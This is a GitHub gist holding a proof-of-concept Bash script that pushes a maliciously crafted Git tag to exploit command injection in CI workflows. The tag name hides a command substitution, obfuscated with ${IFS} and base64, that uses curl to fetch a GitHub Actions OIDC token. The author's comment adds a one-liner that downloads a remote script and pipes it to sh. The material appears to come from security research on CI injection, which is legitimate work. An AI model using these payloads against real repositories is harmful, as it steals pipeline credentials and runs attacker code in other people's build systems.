Skip to content

Instantly share code, notes, and snippets.

@fproulx-boostsecurity
Last active July 4, 2024 20:59
Show Gist options
  • Save fproulx-boostsecurity/67f93a8541d8154910dab3fc2bfc6237 to your computer and use it in GitHub Desktop.
Save fproulx-boostsecurity/67f93a8541d8154910dab3fc2bfc6237 to your computer and use it in GitHub Desktop.
Maliciously crafted Git tag (Bash injection)
#!/bin/bash
#set -x
git commit --allow-empty -m 'New release'
RND_SEMVER="v1.3.$((RANDOM % 1000))"
git tag $RND_SEMVER'$('\
'S="$(echo${IFS}-n${IFS}IA==|base64${IFS}--decode)";'\
'C="$(echo${IFS}-n${IFS}Og==|base64${IFS}--decode)";'\
'curl${IFS}'\
'-H"Authorization${C}${S}bearer${S}$ACTIONS_ID_TOKEN_REQUEST_TOKEN"${IFS}'\
'"$ACTIONS_ID_TOKEN_REQUEST_URL"'\
'|base64'\
')'
FINAL_TAG=$(git describe --tags --exact-match)
git push origin "$FINAL_TAG"
@fproulx-boostsecurity
Copy link
Author

Another more compact option ${IFS}{curl,-sL,gist.githubusercontent.com/fproulx-boostsecurity/fef312cd7d54b9420b10fd50d0793191/raw/id}|sh

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment